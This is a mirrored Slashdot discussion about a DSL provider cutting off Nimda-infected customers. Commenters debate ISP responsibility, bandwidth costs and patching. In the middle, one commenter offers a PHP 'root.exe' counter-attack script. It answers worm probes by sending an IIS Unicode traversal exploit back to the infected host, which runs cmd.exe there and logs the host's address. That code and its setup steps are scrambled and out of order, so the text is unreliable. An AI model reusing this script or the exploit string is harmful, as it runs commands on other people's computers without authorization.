Slashdot Mirror
Shutting Down Worm-Infected Broadband Users
disc-chord writes "Frustrated by Code Red and now Nimda, the DSL provider DSL.net (a CLEC and reseller of Covad) has shut off 800+ infected customers. They claim they cannot get in touch with all of their customers, so they're just shutting them all down, and waiting for the customer to call them. When/if the customer does call they are informed that they are infected with the Nimda virus and must remove it before they will be reactivated. But how are customers supposed to fix the problem when their internet connection is shut down? " I say tough beans: If you get infected, it's your responsibility to get yourself cleaned up. The Internet is a peer-to-peer system where one peer can piss in the public pool. These ISPs are doing a good thing by keeping this crap off the net. Sure, a nicer tactic would be to disable low port numbers for infected users (my provider doesn't let them through in the first place) but this would likely just confuse users. At least this way they know what's up. Flame if you will, but all these worms are going to only get worse since Microsoft will never fix the problem without making sure people have to pay a monthly subscription for their OS, and users are unaware that they have to patch their boxes. ISPs shouldn't have to be responsible for their users this way, but they are responsible for keeping their other users online, and a few infected boxes can cause a lot of havoc for the whole net.
Microsoft will never fix the problem without making sure people have to pay a monthly subscription
I could have sworn both the Code Red and Nimda (multiple) exploits were patched in October *last year*.
Yes its the fault of the users not keeping their machines up-to-date, but please, don't blame this on MS when they released, and advertised, a patch promptly. Heck, it'd be like some idiot running an old version of Sendmail blaming the sendmail author(s) on his box getting hacked. If you're on the net, its you responibility to stay safe.
http://twitter.com/onion2k
You attempted to hack their webserver. Anyone who attempts to hack them gets their connection cut off. Seems a relatively sensible policy in the terms and conditions to me.
Only two things are infinite, the universe and human stupidity, and I'm not sure about the former. (Einstein)
They are just packets and that should be that.
They care because the traffic generated by infected systems can be costly in both cash value and time. Not to mention the fact that there could be liability issues if they knew of infected systems but did nothing about it.
Besides, if there are 3 vulnerable systems on a network, and 1 infected system, the responsible thing to do is to protect the 3 remaining uninfected systems.
(This is a bit off topic, but I figured I'd mention it here for those who think that viruses and worms don't cost anyone any real money...
Wednesday the 19th, my place of employment had to shut down entirely between the hours of about 7pm till around 10pm. Where I work, that kind of shut down costs tens of thousands of dollars. Not to mention all of the hourly workers who were sent home at 7pm. Since their shift ended at 11, they were literally out 4 hours of pay even though they don't actually work with the systems that were effected. Lost production. Lost sales. Lost wages. One tiny, preventable worm.)
"Everything you know is wrong. (And stupid.)"
Moderation Totals: Wrong=2, Stupid=3, Total=5.
I'm in favour of ISPs locking out infected machines that have demonstrated no attempt at fixing the problem. After all, these people have shown a blatant distregard of basic sysadmin responsibilies: how long has CodeRed been known about now?
However, here's a suggestion for a better response than simply removing Internet access to/from infected machines. The ISP runs some kind of DMZ server, but on the DSL side. All web traffic from infect machines is redirected to that one server (via transparent proxying), all other traffic is blocked. That way the end user can instantly see what's wrong. The ISP can also mirror the relevant patches on the DMZ so the end-user can get back up again as fast as possible.
It would take some setting up initially, but would reap substantial rewards in the long run.
| What, you were expecting
-O_O- +---- something witty?
I pay a lot of money for my leased line. So do my ISP's other customers. A substantial fraction of my expensive bandwidth is being eaten up because other people (mostly also customers of my ISP) can't be bothered to patch their systems. The service my ISP is able to provide me is consequently degraded, and I'm not happy about it.
If an ISP emerges who only accepts clueful customers, I'm likely to move my account. ISPs know this: if they don't switch off the clueless (and consequently troublesome) customers, they will lose the clueful (and consequently more profitable) ones.
I'm getting to the point where I think there would be some merit in having to pass a test, like a driving test, before you can connect your computer to the public information infrastructure.
I'm old enough to remember when discussions on Slashdot were well informed.
Oh, that's just pathetic.... You would only use the "but what about the elderly and the children" argument to drum up emotion when you have no other logical argument. To respond in kind, what about the other 75 year old senior citizens who have a clean computer and can't read web pages or send mail to their grandkids because the network is so flooded that they can't get anything through. Do you think they'll understand why this "dang new-fangled contraption ain't workin'?"
I'm not a cold-hearted person, but you've got to look at the facts. Shutting down these connections is pretty much the only way to make sure people will clean up their machines. You can't forget that the Code Red II virus, and presumably nimda as well, opens up a nice little hole that can be used to turn your machine into a Zombie. If the zombies get used, an ISP will have machines on their network attacking corporate and government computer systems. That's an absolutely *massive* liability there, especially since it can be proved that the ISP was aware of the infected machines and did pretty much nothing to eliminate the problem.
The best idea I've seen yet is the one to set up a "private" network for the infecting machines and direct them there. For those ISP's that don't want that expense, maybe offering to send them a CD with the patches and instructions in the mail for a reasonable fee would be a better alternative.
GreyPoopon
--
Why is it I can write insightful comments but can't come up with a clever signature?
I pay for DSL, i can run *WHATEVER* i want on it.
bull... what company do you go by that doesn't have a hugeass EULA?
And keep in mine that EULAs and any sort of contract is 98% CYA... It's there with tonnes of clauses that you will violate every day but are there so that if you do something stupid, they have a contract saying that you're not allowed to do that. If everyone were to go 100% by their contract, they wouldn't be using the web at all. Yes, this does give them excessive power, but they don't exercise it unless they need to, which is why they still have clients. Same reason why noone reads the EULAs on software, they just click "yeah I agree lets get on with it". The EULAs are there so if you do something annoying, they can nail you for it.
NO CONTRACT SHOULD EVER LIMIT FUNDEMENTAL HUMAN RIGHTS
SO DON'T SIGN IT. It's your choice to sign up for an ISP that has a crazyass EULA. As long as there is competition there will be resonable TOSs, and when there isn't, that's where the goverment is supposed to step in to limit what they can do.
I think that you're going a little haywire thou with your freedom thing. Try to redirect some of that energy to what's happening in the aftermath of the attacks, or towards MPAA or RIAA.
If God gave us curiosity
I made a PHP script, by modifying a similar one used for Code Red. First make a "scripts" directory in your web server's root directory. Now put this into a file called "root.exe"
/* Check to see if the connection actually opened */
/* URL-encode the message... */
/* ...and send it */
/msadc/..%c0%af../..%c0%af../..%c0%af../winnt/syst em32/cmd.exe?/c+$string HTTP/1.0\n\n");
/* close the connection (though it probably got closed automatically) */
/usr/local/apache/httpd.conf, whatever it is) and put this type in like this:
.php .php3 .exe
/tmp/nimba.log.
<?php
/* Open a connection to the offender */
$fp = fsockopen($REMOTE_ADDR, 80, $en, $es, 5);
if ($fp)
{
$string = urlencode("net send %COMPUTERNAME% WARNING: The NIMDA worm has been detected on your computer. Please shut down the IIS web server that is currently running and keep it disabled until you can patch and/or re-install your system, or better yet, upgrade to Linux or FreeBSD. Visit http://www.kb.cert.org/vuls/id/111677 for more information.");
fputs ($fp, "GET
fclose ($fp);
}
/* for fun and confusion.. */
header ("HTTP/1.0 404");
echo ("<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n");
echo ("<html><head>\n<title>404 Not Found</title>\n</head></body>\n" );
echo ("<h1>Not Found</h1>\n");
echo ("The requested URL $SCRIPT_NAME was not found on this server.\n");
echo ("</body></html>\n");
echo ("<address>Apache/1.3.20 Server at $SERVER_NAME Port $SERVER_PORT</address>\n");
echo ("</body></html>\n");
$res = "dirty\r\n";
$log = fopen("/tmp/nimda.log", "a");
fwrite($log, $REMOTE_ADDR . " " . date("D, d M Y H:i:s T") . " - " . $res);
fclose($log);
?>
Then, (after making sure users can access the file.. try going to http://machine/scripts/root.exe. It's going to print out the contents of that file. You want to change that, right?
Well here's how you change that. Edit your httpd.conf file (/etc/httpd.conf,
AddType application/x-httpd-php
Now restart Apache by issuing one of either:
/etc/rc.d/init.d/httpd restart
apachectl restart
That should do it, and you're going to have a logfile of all the people who have been warned in
Consider the daffodil. And while you're doing that, I'll be over here, looking through your stuff.
I don't believe that is the reason why the provider shutdown their customers. I believe the reason is that they have very specific expectations of bandwidth usage. And they use these expectations to create a nice little equation: for X broadband users we need to have f(X) available bandwidth from our service provider, where f(X) is significantly lower than sum(all user's subscription rates). So while they guarantee you 7x24 access (at whatever rate you paid for) they're only expecting you to be a user 1-2 hours a day, maybe 3-4 days a week. The virii turn your computer bandwidth usage into 7x24 at your subscribed rate. And this really screws up their equation. This is one of the reasons that several broadband providers don't allow you to have servers on your network. The usage patterns of your web server or email server are too unpredictable, and consequently they have to set a policy that forbids them.
If they don't know about, or stop the virii, they end up with bad trending data. The trending data is what they used to determine whether or not f(X) was reasonable. When the trending data changes, so does f(X), and they have to spend more money believing that they need more bandwidth. Failure to do this results in customers switching to another provider. This is *especially* true of DSL customers for whom other providers are nearly guaranteed to exist (since DSL has open access). So, when a provider know that the trending data is bad, they have one of two choices:
I guess I find myself agreeing with Taco, but only to a limited extent. The providers have to make at least some consession to the users who need to be able to download patches. It's easy for us in the *nix world to raise our noses at this. But don't forget that the very first Internet denial of service worm exploited sendmail. We're not immune. We're just not popular. And when the day comes that we are popular, I would like to think that there is a way for me to get the code that will resolve a problem that I didn't know I had.
Key to financial independence: Spend less than you earn. Save and invest the difference. Do it for a long time.